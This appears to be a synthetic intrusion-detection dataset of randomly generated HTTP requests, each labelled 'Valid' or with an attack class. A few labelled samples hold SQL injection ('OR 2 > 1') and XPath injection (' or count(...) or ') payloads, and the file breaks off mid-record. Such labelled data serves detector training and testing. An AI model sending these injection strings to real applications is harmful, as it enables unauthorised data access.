If-Match: "sbc94y7.K7rZN.IEdv"
If-None-Match: *
If-Range: "obeLxAKivl4.Yg2Y"
Max-Forwards: 07
MIME-Version: 1.9
Pragma: suefnsTl=sRrl2dms
Proxy-Authorization: NTLM Y0xkbm54c2t5dGV3Y3JucGllb3NIYW55RWlpdWVucm5hdGV0c2VndWhlc21yb3Q=
Authorization: Digest opaque="el1Aa"
Range: 173-
Referer: /edh7oa/ekoaay/hczia8ef.mpeg
TE: chunked;q=0.9,deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: eOltntrj0/4.8.2.5.0
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: HTTP/5.2 www.xZuTo.css
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46237
Start - Id: 32888
class: Valid
PUT /s0Tlpolaaelo/estuemnitz/nieri1Jeowhn/islhW4sahmnyhmnee/ruOnEgm4van/Lvgroup bymq/Pf/tretrlldndhttqsuc5/7b_wD0EOu/a96/ii6urqdshne2h/yTY49f@iD3G7g_D.bin? HTTP/1.1
Content-Length: 259
Content-Language: enx,fa2e
Content-Encoding: deflate
Content-Location: http://uOeevn.fr/RtosR/ena5s1An/noseenr/e47wb/2geer.msf
Content-MD5: b0d4d2p0bHVpaWlwYW5uZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jun 08 17:54:46 UTC
Last-Modified: Wed, 03 Jan 07 10:07:47 GMT
Host: 130.114.25.108:80
Connection: keep-alive
Accept: text/plain
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6, identity, compress, compress
Accept-Language: *;q=0.7
Cache-Control: max-age=978
Client-ip: 242.215.64.17
Cookie: e3gaRu=ieew;iiNNehe1syten=754
Cookie2: $Version="6"
Date: Sun, 23 Jul 06 02:52:36 GMT
ETag: "88Q4BQAglvBW0JGF80Q"
Expect: im1eet
From: heae@rytmtosHp.biz
If-Modified-Since: Mon, 29 May 06 01:21:08 GMT
If-Unmodified-Since: Thu, 21 Apr 05 12:22:18 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Sep 07 24:59:16 CET
Max-Forwards: 4
MIME-Version: 4.5
Pragma: gm='nhr'
Proxy-Authorization: 9TozsW ia2ust=fortes
Authorization: NTLM cWphaHV3blRUeW9tbmx4cmZzN3NzZXNyNGxPb2VpbG9uYXlvdGlyZG9uZXM1bg==
Range: -11
Referer: /5dsws98/sEin/piiti/teoraihp/lceDeofw.pdf
TE: trailers,gzip,gzip;q=0.7
Trailer: If-Match
User-Agent: rQo40SLs http://www.eefrNr.de
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: FTP/9.2 www.tlsa.gif:2, 5.2 www.sele.tiff
Transfer-Encoding: nahlh; rTtEpay=eelr
Upgrade: rvs/0.3, rteao/7.9, csrh/4.1, a1iosi/1.7
Warning: 033 141.231.242.145 "t2po3soltutrrfuxesh" "Fri, 15 May 09 15:44:54 CET"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a3obti=5519929&537snvOqrni=148470&RYdocumentpositionT-prVbinsshutdown=nhaeA&atriq=reiwgoa&nnafpeot7ox=Haio7&6ocethLacc1aaE=metaashtacces&X_SBZ=hWVDKxr-&aii6n8acfEnjjyN=>&of=ou&aniwaatenlmb=y&x1s&enRebEihwd=56d 9ineg@7co&qoeunOnes=AsyVc&Nrtmol7hescnri=as

End - Id: 32888
Start - Id: 17083
class: Valid
GET /is0opgqgoH/s9rjlauhkleoaen4/g7@evdaY3o@dqwbu/yDlOj1E@Rl/CxeNtmlyrxio6ur/d8srw__Aa4U/rhnt3.tiff?F3Li=hp&7q4nmhoeery=nnnatenhomefo%3Aewm%26divo%7C&nsify=ah%3D HTTP/1.0
Host: 217.132.88.13
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 187.180.35.173
Cookie: iir1BctE8=afrom:me+>oidnlsem& 7p;IZmGz7q54=cietptkedu;SdgdanxdtaysXg=152834;seglen=oskzr]mao
Cookie2: $Version="845"
Date: Mon, 26 Feb 07 15:13:58 CET
ETag: "sl7pbnn@0pCL93xhw2"
Expect: 100-continue
From: mjsOfho@efDme.uk
If-Modified-Since: Sun, 05 Mar 06 01:12:17 UTC
If-Unmodified-Since: Thu, 09 Oct 08 19:33:04 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Dec 07 07:16:52 GMT
Max-Forwards: 7
MIME-Version: 0.2
Pragma: Aen='chtec'
Proxy-Authorization: Digest uri=http://www.esna.de/eesDr/adeEbd/ldtoxb/sFal/terpqfd9.htm
Authorization: Basic MWluc2I6OXRlYVRuc3Q=
Range: 13-,575-09299
Referer: http://orrnta2d.uk/Istle5io.avi
TE: chunked;q=0.7,gzip
Trailer: Accept
User-Agent: ethimbpseit
UA-CPU: PowerPC
UA-Disp: 3299,457,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: HTTP/5.5 www.oqhi.htm
Transfer-Encoding: gzip
Upgrade: eruets/8.1, e7Soi/2.4, 4eth/5.6, ornd/2.3, iaT/2.1
Warning: 853 51.149.87.169 "aeHtkSbtamk" "Sun, 01 Jan 06 06:05:57 UTC"
X-Forwarded-For: 77.229.71.116
X-Serial-Number: 17174419292129745419
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17083
Start - Id: 14395
class: Valid
GET /9SA6fhCoalXc/RI5fromsBftp6fbx/kj/oatmtabh/ione1rtjthe0dtrdtj/ehsd/a3F7dDiUPD1Psw/rxshutdowna5psDD_.NTh.png? HTTP/1.0
Host: 131.199.218.201:64
Connection: close
Accept: application/zip;q=0.7, audio/*;q=0.1, video/*
Accept-Charset: iso-2022-kr, euc-jp;q=0.8, isiri-3342;q=0.3, windows-1251
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 11.114.199.144
Cookie: oih7tatto=lh6;OXvarm=85;cB1xcns=ttinsert;6V9enconnectknPm=e;ba4lit3ao9oitt=/]eot
Cookie2: $Version="201"
Date: Sat, 02 Dec 06 17:53:03 GMT
ETag: W/".hk0JKuS95FK1JbPTAD"
Expect: 2o7t9Lld=xaae;oliro
From: Rt7eei@haruek9a0.st
If-Modified-Since: Sun, 04 Jun 06 18:51:07 CET
If-Unmodified-Since: Fri, 22 Apr 05 16:22:03 GMT
If-Match: *
If-None-Match: "jW6hbNQt0xSG7Il."
If-Range: Thu, 08 Jan 09 09:51:11 GMT
Max-Forwards: 19
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: ea2o mixe=e9dtn5
Range: -71089,-74863
Referer: http://www.zmeodo.st/llsgzh/s6dmd/gc5dl/ebsa2by/feslshO.mdb
TE: chunked;q=0.6,gzip;q=0.1,deflate;q=0.1
Trailer: Authorization
User-Agent: Mozilla/8.6 (Machintosh; U; Mac OS X 8.3; ca-pe; rv:2.8.2) Gecko/72522272
UA-CPU: StrongARM
UA-Disp: 437,7819,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: 9.6 www.ie85h.png
Transfer-Encoding: compress
Upgrade: ehtqh/8.7, no6/2.6, ra6cii/9.3, giqoet/7.7, tatgeg/7.3
Warning: 239 www.iiaa.jpg "v1nj0rT7djelun" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14395
Start - Id: 26421
class: Valid
GET /hngaeV1m-WixFS/mpdowc32uui.html?hr3c=%29kwdmomnnse&e6OiEAse5p=yEr7h&6wh=eeeacre&te=85070928&t8e0di=8697&wqoeer=11&oAakGaedw=m0Th&e6cFsgobtS=%25haoz0uEN&itupt7=%3CIe HTTP/1.0
Host: 108.228.194.18
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.93.135.240
Cookie: oeoghthyrr=atSer;IqiframecW=t7CU1Gj
Cookie2: $Version="6"
Date: Tue, 29 Jul 08 03:09:32 CET
ETag: "fK1XDGMWJ.QIP@.ZL.v"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Sat, 05 Jul 08 08:41:05 CET
If-Unmodified-Since: Sat, 19 Nov 05 22:01:30 UTC
If-Match: "vD3JuDLbMaLpdeQ"
If-None-Match: "ep9dIftIi4hgU45QK1l"
If-Range: Sat, 01 Aug 09 23:45:20 GMT
Max-Forwards: 522
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="s7ab"
Authorization: il8e S9dws6t=h9to59of
Range: 976674-,-469,33-19
Referer: /ltNcEA/RteTd/srnRhlen/IRhmaw/4sOyew.dll
TE: trailers,trailers
Trailer: If-Range
User-Agent: zhzeg (eTJm4CTR.k; a5XySA4; gkl13P; eUvj_iGOm; 80cfNM4c9)
UA-CPU: StrongARM
UA-Disp: 0058,1440,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1670x4966
Via: 5.2 www.etaietm.html, aurois/6.9 19.237.24.148, HTTP/5.9 200.171.138.209
Transfer-Encoding: nexHi; klk2c=iaae
Upgrade: lwmdc/2.7, Het/5.1
Warning: 710 www.ehhtaa.js "saamq" "Sun, 18 May 08 10:22:40 CET"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 3166594195
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26421
Start - Id: 42500
class: SqlInjection
GET /ZigavtonxLbnRS/PL0Dhj/es6bln/RTgrtaeponoti/nggSfmtheNtuhAscns4n/79q.shtml?etm3iithst6s=atjxesd3aDetltbl9&Qjn98tte1owAe=%3Fst&vZo3y9@=u1BqIxA&tteiaewine=+++OR++++2+++%3E++++1&wZ=644&wEO5S=s&exdk0=r&sserlidma=583611&Bwo1=eaS+8&CnCxterm=630911&tbotn8ht=ofAd1T&atasia6rsk6ih=171944&stfglyeseeu=esstdin&CeiticnEeira=2&LApemieAazltsW=ewtpge0tzbdu HTTP/1.0
Host: www.eryatge.be
Connection: close
Accept: audio/*, application/postscript
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress, gzip;q=0.8, gzip
Accept-Language: dhhpn-lpe;q=0.9
Cache-Control: no-store
Client-ip: 196.189.248.125
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="059"
Date: Sun, 08 Apr 07 19:31:08 GMT
ETag: W/"R_iyxOFyTu-4qGue"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Thu, 24 Jan 08 24:15:18 UTC
If-Match: "z3ouFUbDR7fBnx6a"
If-None-Match: *
If-Range: Sat, 10 Mar 07 04:51:33 UTC
Max-Forwards: 3193
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Ebra8 aiKrw2u=2h7Ged
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: /1nNweuo0/tto8nhws.swf
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: nFy..O9MH http://www.btMXasl.net
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 5.3 11.222.87.252, 4.3 151.61.44.116
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 029543372781579317
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42500
Start - Id: 23911
class: Valid
GET /oafapmaasneiesnT/ckW/msufeerdphkc4on/XmQp4styleyiW.PJo/oFjvBZBOhE3W5/u2rs/ZopassthrudropCI/nOf3tiotwtTkedsst/vCYX3o6x7b56/Ez5sock_streamgroup byTiP0NW1f/CoNaehttus.jpeg? HTTP/1.1
Host: www.ksuond.gov:900
Connection: iiewdal
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5taOjT-ahnetuq;q=0.2
Cache-Control: max-stale
Client-ip: 16.124.33.245
Cookie: hc7qeietaeDsi=okasRALe8c;s0ndeh=76201;_Yf0IB1=4nmee7onaneftotblf
Cookie2: $Version="9"
Date: Tue, 24 Oct 06 08:20:30 GMT
ETag: "ul6z@rBPwtNK2TcY1"
Expect: l9rgded=egntpm;osnEt2rs
From: gccehN@uRradmbtae.biz
If-Modified-Since: Fri, 13 Mar 09 02:31:36 UTC
If-Unmodified-Since: Sun, 25 Feb 07 07:47:55 UTC
If-Match: *
If-None-Match: "NdrAGYlWM8wMwo2n9gEt"
If-Range: *
Max-Forwards: 4
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1m1o hniwe=rioiti
Authorization: Digest algorithm=MD5
Range: 9-,-0501
Referer: http://2Elsv.it/Sfut5/hNaeiera/Sauu/iRmSbt.shtml
TE: gzip
Trailer: Max-Forwards
User-Agent: 2oGSroG2 http://www.ywvha.org
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 0.5 23.102.47.220, 2.9 221.113.209.231:89484, HTTP/0.0 www.6anscx.js
Transfer-Encoding: ncbe
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 941 www.oEhntdsr.htm "tUs5csE0e0rt17tgQw6" 
X-Forwarded-For: 8.218.42.202
X-Serial-Number: 383867
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23911
Start - Id: 28107
class: Valid
GET /j3fo-phph59iH/puNHfDhy1qKUd/e24CUBnjPzg1lbCg5Ck.tiff?6is=ieiipeoctinpassthru HTTP/1.0
Host: www.ewe5s.biz:80
Connection: nftrn
Accept: application/*;q=0.4, application/x-tar;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8oisa-d;q=0.4, aoflrett-7hon;q=0.8, inpt-byaysf9;q=0.8, theouet-pTnltheu, 08-2Dva;q=0.0
Cache-Control: max-age=55
Client-ip: 126.23.16.226
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="5"
Date: Sun, 19 Nov 06 06:13:23 UTC
ETag: "V1brjk9uOr@kji@"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Wed, 03 Mar 10 15:43:18 CET
If-Unmodified-Since: Fri, 01 Apr 05 24:24:17 GMT
If-Match: "hTYW.O9owwoQPbK9XZ5K"
If-None-Match: *
If-Range: "Yq@OpGA@8LbQj7_nu5"
Max-Forwards: 47
MIME-Version: 8.5
Pragma: eu1='Zn'
Proxy-Authorization: NTLM c2huT3NveW4xN2lnNm5yeW9qbDR0ZmV1QUhvcmxhZXR0b21hZA==
Authorization: Basic cmV5TmE6b2VFbzQ=
Range: 432781-
Referer: http://www.1tse.it/tpoim8h/itTuic.mpg
TE: chunked;q=0.8,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/8.2 (X11; U; Linux i386 3.2; sl-c2; rv:3.4.5) Gecko/35100078
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4261x691
Via: 7.5 197.122.92.140, 9.9 238.196.201.228
Transfer-Encoding: identity
Upgrade: re9sa/3.4
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 00220093101680020421
----: -------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28107
Start - Id: 10704
class: Valid
GET /havingRxgreplace8/s@T8Vj3WLk1vScnfjt.html?iiyeGvxi=oinsert%27&n@g@C9rwhere=119975 HTTP/1.0
Host: www.pam2bsF1.fr
Connection: tnbkw
Accept: application/postscript;q=0.4, text/xml, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 8aU-kh9;q=0.4, r-6i;q=0.8
Cache-Control: no-cache
Client-ip: 22.93.45.138
Cookie: ene2hseoxyo=[Dtuspse? orriieB85;rHDaWghyttrm=aS-Brzie;cmxoaePOt9=we;uuftinp=goiseiur2jt4pon1;tSiN=hi?alinknNMto'N e;wschildhG=wtd
Cookie2: $Version="808"
Date: Sat, 22 Nov 08 07:26:23 GMT
ETag: W/"MKxlC@xWZOi4y5u"
Expect: eocns=iylibw
From: apymaii@Pdts.net
If-Modified-Since: Tue, 20 Jan 09 16:45:20 CET
If-Unmodified-Since: Sun, 20 Dec 09 02:05:45 GMT
If-Match: "-Lw6BhFmsQ331YmDkZF"
If-None-Match: "K-2phcN5XOsORF985yFN"
If-Range: Fri, 25 Jul 08 18:26:22 CET
Max-Forwards: 1663
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZTFvZWU6ZmF3YTQz
Range: 569080-9470,36135-,7-
Referer: /teesaS/daee.mp3
TE: deflate;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 8.5; 7t-sl; rv:7.8.2) Gecko/17563187
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 060x417
Via: 8.4 www.rRlrqims.js, 1.8 www.yu8mo.jpeg
Transfer-Encoding: rGevmt
Upgrade: e0Tk/8.6
Warning: 733 85.32.151.90 "MQtmgt57qqbafdmyE" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 39073163652713
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10704
Start - Id: 48582
class: XPathInjection
POST /Jpe/9s/speln4neeatLwmssod/rPO1tCxoUq-sK3Y/RoWsblnshhidO/F@/ohu2t7urwFgsoui1me.js? HTTP/1.0
Content-Length: 283
Content-Language: uzo,eemeods
Content-Encoding: compress
Content-Location: http://esmoL.net/t35sli/uorKhs/fkhal0g.tar.gz
Content-MD5: NnJsZUxDbHlpYU5tME9pZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 02:46:49 GMT
Last-Modified: Sun, 20 Mar 05 05:32:34 GMT
Host: www.rhne5.gov:78
Connection: keep-alive
Accept: video/*, image/*, image/png
Accept-Charset: *
Accept-Encoding: identity;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 58.151.109.14
Cookie: c6ino=hTyohhnohh;nezahmuacoFdcae=TyasOm;9PechoElXD=uhsw&)Ta-;itmissyeLnnot=ygbAou..I1wQ;eore=s@I3cW.qd07;gAK8passthru8328Es=77752
Cookie2: $Version="380"
Date: Sun, 06 May 07 24:27:46 GMT
ETag: "pn9FUh6eD1tnxJb11"
Expect: giwPt=dOet;rlrwiz=tf8E
From: kvhmage@1ptmhTa.org
If-Modified-Since: Fri, 14 Jan 05 12:59:00 GMT
If-Unmodified-Since: Tue, 16 Jun 09 15:20:14 CET
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: Wed, 30 Jul 08 18:43:05 UTC
Max-Forwards: 4186
MIME-Version: 2.8
Pragma: 8=rhc
Proxy-Authorization: Basic aXJEenRldGs6cndhY3Q=
Authorization: Basic N2V6cjphZXVxaWk3
Range: -13,5-
Referer: http://www.ot26ria.org/elYrhm/1m6oel/nlemiEq/alt1s/4ntrc.gif
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 4.5; za-l1; rv:0.3.5) Gecko/08912412
UA-CPU: Sparc
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 316x0903
Via: 2.1 201.150.192.104, FTP/2.0 142.91.43.5
Transfer-Encoding: compress
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 7270498522514093
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eportm=fgace'     or     6   <  count(path/child::*)     or 'frHaaa'    =  '&dojilnds9=ey1q&cnaaIgeniaU=ttar3lyt&maeyW=o&mcrg0ats=8ap1esdceSriaYohna&Ur.scriptj=ansto&firwl=ou&NiaiautTC=pslhttp3$~hpe =ddrop&aobig=htldFs2e7N>q e&mgsdbnewOl9t=tmdoshTetT;

End - Id: 48582
Start - Id: 3333
class: Valid
GET /a8LyOBS8p.tiff?1p8uhurei=157&Ai=10 HTTP/1.1
Host: 162.128.227.250
Connection: close
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i7eyotr-e;q=0.4
Cache-Control: oeu9a='shrst'
Client-ip: 196.125.235.204
Cookie: @YGX=4Frev= ptp hpnJ/;at=kJ6og;hergt3rendm=hosh;vn=R8jfeaihqew;2e1=s50KqZohObRH
Cookie2: $Version="10"
Date: Thu, 06 Apr 06 24:10:49 CET
ETag: "4nn5m-sEPn0xqpWeZRNN"
Expect: oler1el=keiztr
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Thu, 24 Apr 08 01:20:30 CET
If-Unmodified-Since: Wed, 24 Mar 10 19:07:51 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 04:52:05 CET
Max-Forwards: 33
MIME-Version: 7.7
Pragma: hritT=rihut
Proxy-Authorization: Basic ZXR5YWx1Om5pYThl
Authorization: NTLM aHdzY25hODIzc3FodW9pZWRvbzJhZWlydDF6YXFrdWhpaXNl
Range: -842455
Referer: /eetbi3vn/ttio5.tar
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: c_oDYDqwY http://www.snir.org
UA-CPU: Sparc
UA-Disp: 2815,9400,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 701x9468
Via: 1.8 www.tes1Sier.htm, i6os/4.0 www.rvmedR.gif:08829
Transfer-Encoding: identity
Upgrade: e7H/3.8
Warning: 533 www.htse25nt.gif "2cuhieota1sornn" "Wed, 28 Jun 06 01:33:44 CET"
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 1661019854
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3333
Start - Id: 31250
class: Valid
GET /175n65linkwKZ.xGa/q5as.pl?ltu1srSfleecso=+dePtelnetf+catiuqp&haeocSo2htetn=wao&av8etemaleltnho=%3D%2Bifs&wzdaue=ees&hN4jT=250232&QkIo=d2ichwT1sJN5&jueeel=auhzhb&rvSieo=%25h+%40t%5Dob%2FtAdG&nqetclx=nrz HTTP/1.0
Host: www.30te7.uk:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 32.138.140.81
Cookie: m9Jo=ke;Myk4f5F9VW=tLijaeEPaxlthcea;Hwbgpeloz=a+3;5owa8=7025349;rkte=1
Cookie2: $Version="86"
Date: Fri, 12 Oct 07 20:35:43 UTC
ETag: W/"F9SvO6rqqv0-GZP"
Expect: 100-continue
From: ettihl@s2tpbthdps.com
If-Modified-Since: Sat, 26 Dec 09 04:03:09 CET
If-Unmodified-Since: Sat, 27 Jan 07 11:12:35 CET
If-Match: *
If-None-Match: "xNUfNUGLM2pU1jqtA@"
If-Range: "6am13tziAX5yo.1N"
Max-Forwards: 68
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bHJzVGpuYTpybW9qZWg=
Authorization: mchat ddboriUe=nwrit
Range: 019-,893-4434
Referer: http://aphu1Od.de/trrou7/6tsh7rh/rrtNA/Ueeoesze/loe1h.jpeg
TE: trailers,deflate;q=0.3,trailers
Trailer: From
User-Agent: Mozilla/4.8 (X11; U; Open BSD i586 5.6; 6r-cs; rv:5.1.7) Gecko/98449535
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3795x126
Via: 2.7 102.214.73.244:06708, FTP/4.6 www.aduChitd.html, FTP/2.2 www.o4reyhcp.html
Transfer-Encoding: deflate
Upgrade: saowt/0.0, sfnh/5.8, toer/0.8
Warning: 221 www.O4or.jpeg "kaaoteuyfsaeeehare1" "Wed, 30 Mar 05 17:25:44 GMT"
X-Forwarded-For: 154.121.5.105
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31250
Start - Id: 12118
class: Valid
GET /onKoesthsureu/higeerhnl48joh/rrJbRW7YVDOLOaTNjma0/gt/iL/hrzcleh3/OperldivT55XwherePYbobject/mkSGEuTcq@V/97qRJ/eFaiualfo8dplcvuehe.dll?QAserviceszqoaf3JF=u%28%28&n8i4iRuoin=cehsf4dOruah&mRaalbheooneoy=%28logkan&enjBtemo7p7ra1=22 HTTP/1.1
Host: 189.225.7.46
Connection: gEtIoEd0
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 92.187.253.162
Cookie: nsm079=347949;aelqE96lsseonbe=hmia:scriptf/=\=ree g 
Cookie2: $Version="66"
Date: Thu, 04 Nov 04 11:22:11 CET
ETag: W/"m4kMhaJSuJn1SXDt9"
Expect: umooxwre
From: 1ygx3rl@zebdo07.net
If-Modified-Since: Wed, 16 Nov 05 20:51:50 GMT
If-Unmodified-Since: Sun, 30 Sep 07 19:47:33 CET
If-Match: "EFF6tk.A8.T8k_0u6n"
If-None-Match: *
If-Range: Sun, 08 Mar 09 09:23:03 UTC
Max-Forwards: 717
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic bmx6dGVoOm9BYWRp
Authorization: NTLM NmltbTNnbmU0YXRnZm9mdHJ0bG9zaW5kcjZMYTBBNm9kT2llaW9zb3NhZWVwb2M5
Range: 2-
Referer: http://e3nEBre.com/e4ggesan.mpeg
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.9 (X11; U; SunOS sun4u 7.2; bh-tl; rv:6.2.5) Gecko/56575034
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: FTP/9.7 www.Nq7tmrn.shtml, 7.5 www.ahic6o.gif, FTP/9.4 49.62.119.58:9
Transfer-Encoding: 3o6Ob
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 192.179.67.70
X-Serial-Number: 572256
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12118
Start - Id: 37694
class: LdapInjection
PUT /loutti.gif? HTTP/1.1
Content-Length: 115
Content-Language: Solos
Content-Encoding: identity
Content-Location: /aNhrme/liebprc.conf
Content-MD5: b2FhVHJzRXBrT3k2M3JMbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 12:53:58 UTC
Last-Modified: Mon, 26 Feb 07 07:12:47 CET
Host: www.5zsd1xhdvs.cz:80
Connection: close
Accept: audio/basic;q=0.5, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 240.130.115.181
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Tue, 01 Jan 08 21:58:12 GMT
ETag: W/"MMz6nJo0JmIGI1uG"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Fri, 21 Oct 05 15:39:02 UTC
If-Unmodified-Since: Wed, 22 Aug 07 20:40:01 GMT
If-Match: "RYR8tqjummLZhkCufZD"
If-None-Match: *
If-Range: *
Max-Forwards: 089
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: -5,143268-,83605-
Referer: http://www.miexorv.cz/neAww/uLydA/r5e2/trdk/aaraE.asmx
TE: chunked,gzip;q=0.3,deflate
Trailer: Transfer-Encoding
User-Agent: 0rMh/2.3.4.7
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 940x1719
Via: 5.2 112.123.85.248, mgwt/6.4 95.22.0.37, FTP/5.7 www.diyrcnt.tiff:6
Transfer-Encoding: nzeeet; iI7k=eyu8teiu
